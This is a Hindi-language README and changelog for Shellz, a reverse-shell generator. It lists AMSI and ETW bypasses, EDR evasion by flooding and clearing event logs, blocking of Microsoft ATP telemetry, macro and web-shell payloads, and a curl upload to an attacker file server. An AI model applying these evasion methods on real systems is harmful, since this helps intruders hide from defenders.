Shellz
सामान्य रिवर्स शेल्स को तेज़ और आसानी से जनरेट करने की एक स्क्रिप्ट।
विशेष रूप से तब उपयोगी जब PowerShell और Python रिवर्स शेल्स की आवश्यकता हो, जो सही रूप में प्रारूपित करना एक सिरदर्द हो सकता है।
PowerShell रिवर्स शेल्स
- प्रॉम्प्ट के ऊपर और कार्यशील निर्देशिका में username@computer.(domain) दिखाता है
- इसमें आंशिक और पूर्ण AMSI-बाईपास है।
- TCP, UDP और SSL शेल्स
- नया कस्टम TCP रिवर्स शेल!
- नया कस्टम SSL रिवर्स शेल!
- रिफ्लेक्टिव लोडिंग theart42's अद्भुत Sharpcat!
- Windows PowerShell और Core PowerShell
- फ़ाइलें अपलोड और डाउनलोड करने के फंक्शन। (sc0tfree द्वारा Updog का उपयोग करके)
Python
- कोई PowerShell? कोई समस्या नहीं!
एम्बेडेड Python लोड करें। हस्ताक्षरित फ़ाइलें और Microsoft Intelligent Security Graph द्वारा विश्वसनीय।
ngrok समर्थन
- ngrok को स्क्रिप्ट के अंदर से शुरू/रोका जा सकता है
- पेलोड ngrok पतों के साथ जनरेट किए जाएंगे
Updog समर्थन
- आप Updog को स्क्रिप्ट के अंदर से शुरू/रोक सकते हैं
- PowerShell रिवर्स शेल्स में अपलोड/डाउनलोड फंक्शन एम्बेडेड है
- nix से curl का उपयोग करके अपलोड करने के लिए:
curl -F path="absolute path for Updog-folder" -F file=filename http://UpdogIP/upload
Shells को Git से इंस्टॉल करने के लिए
git clone https://github.com/4ndr34z/shells
cd shells
./install.sh
BlackArch पर shells इंस्टॉल करने के लिए:
स्क्रीनशॉट

आवश्यक निर्भरताएँ
netcat, rlwrap, jq, basenc (coreutils)
वैकल्पिक निर्भरताएँ
updog, ngrok, xclip
YouTube वीडियो
Shellz 1.7.5
संस्करण 1.7.7
- PowerShell अनुभाग में Windows Terminal Init विकल्प जोड़ा गया
संस्करण 1.7.6
- Python के अंतर्गत VBA मैक्रो में एम्बेडेड Python का उपयोग करने का विकल्प जोड़ा गया
संस्करण 1.7.5
- PowerShell के अंतर्गत msbuild.exe का उपयोग करके कंस्ट्रेंड लैंग्वेज मोड बाईपास के स्टेज्ड लोडिंग का विकल्प जोड़ा गया
संस्करण 1.7.4
- Python एम्बेडेड के लिए पेलोड बदला गया। अब स्क्रिप्ट को डिस्क पर सेव नहीं करता
- Python रिवर्स शेल को कुछ हद तक अस्पष्ट किया गया
संस्करण 1.7.3
- Windows के लिए Python3 पेलोड में टाइपो सुधारा गया
- बिना Python इंस्टॉल किए और PowerShell का उपयोग किए बिना Windows बॉक्स पर रिवर्स शेल प्राप्त करने के लिए Python एम्बेडेड का उपयोग करने का विकल्प जोड़ा गया
संस्करण 1.7.1
- SSL शेल में प्रॉम्प्ट में PS जोड़ा गया
- पूर्ण AMSI बाईपास को छोटा किया गया
संस्करण 1.7
- जब पहली बार सक्रिय नहीं किया गया हो तो "updog चालू नहीं है" संदेश हटाया गया
- मेनू में कुछ और ऑटो-एंटर चयन हटाए गए
संस्करण 1.6.9
- ब्लॉक MDE कमांड में त्रुटि सुधारी गई
- init कमांड विकल्प जोड़े गए: cmd, conhost, powershell (यदि पेलोड 8191 अक्षरों से अधिक है, तो इसे सीधे PowerShell से शुरू करना होगा)
संस्करण 1.6.8
- "Microsoft-Windows-PowerShell/Operational" को और अधिक प्रविष्टियों से भरना, ताकि स्क्रिप्ट के प्रारंभिक निष्पादन को बाहर धकेलने का निश्चय हो। (केवल तभी काम करता है जब लक्ष्य पर स्क्रिप्टब्लॉक लॉगिंग सक्षम हो)
संस्करण 1.6.7
- केवल URL-सुरक्षित Base64 एन्कोडिंग थी। पेलोड की सामान्य base64 एन्कोडिंग जोड़ी गई
संस्करण 1.6.6
- PowerShell-लॉग भरने का विकल्प जोड़ा गया। यह कई PowerShell सत्र शुरू करेगा, एक लंबी स्ट्रिंग पास करेगा और बाहर निकल जाएगा। यह लॉग को भर देगा, जब स्क्रिप्टब्लॉक लॉगिंग सक्षम हो, तो पहले के लॉग प्रविष्टियों को प्रभावी ढंग से बाहर धकेल देगा और इस प्रकार शेल के स्वयं के स्पॉनिंग की घटना को हटा देगा। EDR का पता लगाने से रोक सकता है। SentinelOne पर सफलतापूर्वक परीक्षण किया गया।
- भ्रामक मेनू चयन सुधारे गए। अधिकांश मेनू पर विकल्प चुनने पर ऑटो-एंटर हटाया गया।
- Metasploit Multi/handler Listener जोड़ा गया
संस्करण 1.6.5
- PowerShell ETW-पैच जोड़ा गया
- PowerShell एम्बेडेड पूर्ण AMSI-बाईपास जोड़ा गया।
- पेलोड लंबाई जांच जोड़ी गई। Windows कमांड प्रॉम्प्ट (cmd.exe) पर उपयोग की जा सकने वाली स्ट्रिंग की अधिकतम लंबाई 8191 अक्षर है।
संस्करण 1.6.4
- PowerShell SSL-शेल सुधारा गया
संस्करण 1.6.3
- PowerShell पेलोड पर वेरिएबल विस्तार जोड़ा गया, जिससे इसे बिना संशोधित किए e.g. बैच-फ़ाइलों से चलाया जा सके
संस्करण 1.6.2
संस्करण 1.6.1
- लिसनर नई विंडो में शुरू हुआ। (Linux पर वैकल्पिक)
संस्करण 1.6
- PowerShell: Sharpcat को रिफ्लेक्टिव लोड करने का विकल्प जोड़ा गया
संस्करण 1.5.9
- PowerShell: नया कस्टम SSL शेल
- PowerShell: TCP/UDP/SSL चुनने के लिए विकल्प जोड़े गए
- PowerShell/OpenSSL: SSL का उपयोग करते समय सही लिसनर पर डिफ़ॉल्ट करना
संस्करण 1.5.8
- इंस्टॉलर को रैपर-स्क्रिप्ट का उपयोग करने के लिए अपडेट किया गया (< 1.5.8 से अपग्रेड करते समय /usr/local/bin/shells को हटाना याद रखें)
संस्करण 1.5.7
- PowerShell: एक अद्वितीय TCP रिवर्स शेल बनाया गया, जो Net.Sockets.TCPClient का उपयोग नहीं करता
- PowerShell: दूरस्थ त्रुटि संदेश अब ठीक से प्रदर्शित होते हैं
संस्करण 1.5.6
- PHP: विकल्प और अधिक पेलोड जोड़े गए
संस्करण 1.5.5
- अन्य पेलोड पर शेल बदलने का विकल्प जोड़ा गया
संस्करण 1.5.4
- Powershell: NIX पेलोड सुधारा गया
- Powershell: C# को रिफ्लेक्टिव लोड करने का पेलोड अपडेट किया गया
संस्करण 1.5.3
- Powershell: मेनू में पेलोड के लिए विकल्प जोड़े गए।
संस्करण 1.5.2
- PowerShell: अधिक AV विक्रेताओं को बाईपास करने के लिए रिवर्स शेल बदला गया
- PowerShell: फ़ायरवॉल-नियम जोड़ा गया, जो MS ATP को होम फोन करने से रोकता है (यदि चलाने वाले उपयोगकर्ता के पास पहुंच है)
- PowerShell: VBA (MS Office मैक्रोज़) अपडेट किया गया
संस्करण 1.5.1
- PowerShell: स्क्रिप्टब्लॉक लॉगिंग और CheckSuspiciousContent को अक्षम करना
- PowerShell: PowerShell इवेंटलॉग साफ़ करता है (यदि चलाने वाले उपयोगकर्ता के पास पहुंच है)
संस्करण 1.5.0
- PowerShell: MS Office मैक्रोज़ के लिए VBA पेलोड जोड़े गए
- कुछ node.js पेलोड जोड़े गए
संस्करण 1.4.9
- एक सरल C# शेल जोड़ा गया।
- C# शेल को मेमोरी में रिफ्लेक्टिव लोड करने के लिए पेलोड जोड़ा गया। (पूर्ण AMSI बाईपास की आवश्यकता है)
- Rastamouse का पूर्ण AMSI बाईपास जोड़कर इसे कवर करना
- PowerShell: आप स्वचालित रूप से पूर्ण AMSI बाईपास अपलोड और चला सकते हैं। आंशिक AMSI बाईपास इसे संभव बनाता है।
- C# शेल: मेमोरी में लोड करने से पहले स्वचालित रूप से पूर्ण AMSI बाईपास अपलोड और चलाएँ
- Updog और ngrok स्थिति हर मेनू में दिख रही है
संस्करण 1.4.8
- कभी-कभी कम अधिक होता है। TCP/UDP PowerShell रिवर्स शेल्स पर अस्पष्टीकरण हटा दिया गया, क्योंकि यह वास्तव में बाईपास करने की तुलना में AV को अधिक ट्रिगर करता है और पेलोड बहुत बड़ा हो गया था :-) फिर भी रैंडमाइज़ेशन का उपयोग कर रहे हैं।
संस्करण 1.4.6
- वेब शेल्स जोड़े गए (ASPX, PHP, JSP)
संस्करण 1.4.5
- Windows 32 और 64 बिट के लिए 2 c++ रिवर्स शेल बाइनरी जोड़ी गईं।
संस्करण 1.4.4
- Updog को शुरू/रोकने की हैंडलिंग सुधारी गई
संस्करण 1.4.3
- Updog समर्थन जोड़ा गया
- Netcat बाइनरी जोड़ी गईं।
- Powershell: अपलोड/डाउनलोड कार्यक्षमता बनाई गई (अपलोड के लिए फ़ाइलें प्राप्त करने हेतु Updog की आवश्यकता है)
- चल रहे ngrok और Updog के बारे में अधिक जानकारी जोड़ी गई।
संस्करण 1.4.2
- PowerShell: एक नया "मिनी AMSI-बाईपास" जोड़ा गया। (यह आंशिक बाईपास है) Matt Graebers के Reflection विधि पर आधारित
- PowerShell: PowerShell रिवर्स शेल में एक "अपलोड" फंक्शन जोड़ा गया
संस्करण 1.4.1
- AMSI हटाया गया। पर्याप्त परीक्षण नहीं किया गया :-)
संस्करण 1.4
- PowerShell पेलोड के लिए AMSI-बाईपास जोड़ा गया
संस्करण 1.3.9
- पोर्ट सेट करने में बग सुधारा गया
- डिफ़ॉल्ट पोर्ट 443 में बदला गया
- PowerShell: कुछ और अस्पष्ट किया गया
संस्करण 1.3.8
- PowerShell: UDP पेलोड में मामूली बदलाव
संस्करण 1.3.7
- macOS पर केवल नेटिव nc का उपयोग करना, क्योंकि homebrew वाला इनकमिंग UDP पर काम नहीं करता
- PowerShell: UDP पेलोड जोड़े गए
संस्करण 1.3.6
- PowerShell: अधिक पेलोड जोड़े गए
संस्करण 1.3.5
- PowerShell: पेलोड में कुछ रैंडमाइज़ेशन और अस्पष्टीकरण जोड़ा गया
संस्करण 1.3.4
- PowerShell: पेलोड में UTF8 एन्कोडिंग का उपयोग करना
संस्करण 1.3.3
संस्करण 1.3.2
संस्करण 1.3.1
- Python रिवर्स शेल में बग सुधारा गया
- awk जोड़ा गया
- Bash UDP जोड़ा गया
संस्करण 1.3
- Windows Python रिवर्स शेल्स जोड़े गए
संस्करण 1.2.9
- ngrok चालू-स्थिति जोड़ी गई
संस्करण 1.2.8
- यदि इंस्टॉल नहीं है तो ngrok विकल्प छिपाना
संस्करण 1.2.7
- इंस्टॉल विकल्प सुधारे गए: बिना चुनाव किए एंटर दबाने पर डिफ़ॉल्ट विकल्प नहीं करना
संस्करण 1.2.6
- ngrok के लिए समर्थन जोड़ा गया।
संस्करण 1.2.4
- एक इंस्टॉल-स्क्रिप्ट जोड़ी गई
- लापता निर्भरताओं की जाँच और स्थापना के लिए इंस्टॉल विकल्प जोड़े गए
संस्करण 1.2.3
संस्करण 1.2.2
- Ruby, Perl, Telnet और zsh के लिए शेल्स जोड़े गए
संस्करण 1.2.1
- macOS पर pbcopy का उपयोग करके क्लिपबोर्ड पर कॉपी करना जोड़ा गया
- macOS संस्करणों में यह प्रदर्शित नहीं होने पर netcat सुनने के बारे में जानकारी जोड़ी गई
संस्करण 1.2
- लूपिंग netcat शेल्स जोड़े गए। हर 10 सेकंड में वापस कॉल करता है। आपका शेल खो जाने की स्थिति में बहुत अच्छा
- macOS पर चलने पर netcat GNU netcat 0.7.0 Homebrew के लिए जाँच जोड़ी गई
संस्करण 1.1
- macOS के लिए समर्थन जोड़ा गया